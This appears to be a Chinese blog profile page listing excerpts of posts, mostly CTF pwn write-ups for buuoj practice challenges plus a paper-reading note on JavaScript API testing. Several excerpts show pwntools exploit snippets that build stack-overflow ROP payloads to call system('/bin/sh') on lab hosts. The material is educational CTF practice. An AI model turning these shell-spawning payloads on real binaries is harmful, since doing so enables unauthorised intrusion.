- 博客(14)
- 收藏
- 关注
原创 ICSE (2022). Nessie的阅读记录
题目:Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks问题 :几个不理解的名词1:什么是JavaScript APIs?2:什么是Asynchronous ?与synchronous的区别?3:什么是 Callbacks ? Asynchronous Callbacks ?一、ABSTRACT第1句原文:Previous algorithms for feedback-direc
2022-04-06 10:56:34
4494
原创 CTF buuoj pwn-----[HarekazeCTF2019]baby_rop
expfrom pwn import *sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。elf = ELF('./babyrop') # elf函数调用,elf可以bin_sh_addr = 0x601048system_addr = 0x601060pop_rdi_addr = 0x400683payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(
2021-10-11 15:09:52
1972
1
原创 CTF buuoj pwn-----第12题: ciscn_2019_s_3
函数分析编写expfrom pwn import *sh = remote('node4.buuoj.cn', 27939)context(arch='amd64',os='linux', log_level='debug')main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
2021-10-09 17:31:35
1717
2
原创 CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
前言bss是指那些没有初始化的和初始化为0的全局变量bss类型的全局变量只占运行时的内存空间,而不占文件空间。data类型的全局变量是既占文件空间,又占用运行时内存空间的。rodata 的意义同样明显,ro代表read only,即只读数据(const)在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
2021-09-30 15:39:27
1568
原创 CTF buuoj pwn-----第10题: bjdctf_2020_babystack
思路本体有后门函数, 最简单的是直接调用.这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag编写expfrom pwn import * con
2021-09-28 10:33:01
22397
原创 CTF buuoj pwn-----第9题:jarvisoj_level2
1. checksecbing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2[*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000).
2021-09-27 17:21:00
954
原创 CTF buuoj pwn-----第8题:[OGeek2019]babyrop
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag前言梳理记录一下这道题的解题过程.1. checksecbing@bing-virtual-machine:~/pwn$ checksec babyrop[*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
2021-09-27 14:43:50
617
原创 CTF buuoj pwn-----第7题:ciscn_2019_c_1
CTF buuoj pwn-----第7题:ciscn_2019_c_1前言1.checksec2. IDA 静态分析3. 解题思路4. 编写EXP5. 运行EXP, 获取flag后记前言重新梳理记录一下这道题的解题过程.1.checksec还是先看一下保护:bing@bing-virtual-machine:~/pwn$ checksec ./ciscn_2019_c_1[*] '/home/bing/pwn/ciscn_2019_c_1' Arch: amd64-64-li
2021-09-23 10:50:16
826
原创 汇总: pwn分析工具GDB + peda + objdump + readelf
汇总: pwn分析工具GDB + peda + objdump + readelf前言1、GDB的基本操作2、GDB增强工具peda3、GNU工具链 (GNU Toolchain): objdump + readelf前言本篇内容持续完善中…GDB是一个由GNU开源组织发布的、UNIX/LINUX操作系统下的、基于命令行的、功能强大的程序调试工具. GDB主要来调试C/C++语言写的程序,GDB调试是可执行文件而不是.c文件.GDB的一些增强工具:peda,pwbdbg,gef等.GN..
2021-09-10 15:22:05
1284
原创 CTF buuoj pwn-----第6题:jarvisoj_level0
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag前言记录一下pwn的过程, 新手学习日记, 流水线记录.打开题目, 连接靶机,下载文件level0一、checksec 检测文件的保护机制bing@bing-virtual-machine:~/pwn$ checksec ./level0[*] '/home/bing/pwn/level0'
2021-09-02 11:29:23
1149
原创 CTF buuoj pwn-----第4题:ciscn_2019_n_1
CTF buuoj pwn-----第4题:ciscn_2019_n_1前言一. checkesc ,检测文件的保护机制二. 静态分析,IDA打开文件前言记录一下pwn的过程 同第1、2、3题一样,新手学习日记,流水线记录.打开题目, 连接靶机,下载文件ciscn_2019_n_1一. checkesc ,检测文件的保护机制bing@bing-virtual-machine:~/pwn$ checksec ciscn_2019_n_1[*] '/home/bing/pwn/cisc
2021-08-29 23:42:24
678
1
原创 CTF buuoj pwn-----第3题:warmup_csaw_2016
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技
2021-08-29 00:21:58
1945
2
原创 CTF buuoj pwn-----第2题:rip
CTF buuoj pwn-----第2题:rip记录一下pwn的过程同第1题一样,新手学习日记,流水线记录.打开题目,连接靶机,下载文件’ript’1. 首先checkesc ,检测文件的保护机制.checksec在下载好pwntools后就有参考链接: link.参考链接: link.bing@bing-virtual-machine:~/pwn$ checksec test[*] '/home/bing/pwn/test' Arch: amd64-64-lit
2021-08-28 19:24:52
3517
3
原创 BUUCTF PWN-----第1题:test_your_nc
buuoj-----第四题:ciscn_2019_n_1前言简单记录一下pwn的过程首先checkesc ,检测文件的保护机制.参考链接: link.参考链接: link.bing@bing-virtual-machine:~/pwn$ checksec test[*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
2021-08-27 13:33:00
18176
11
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人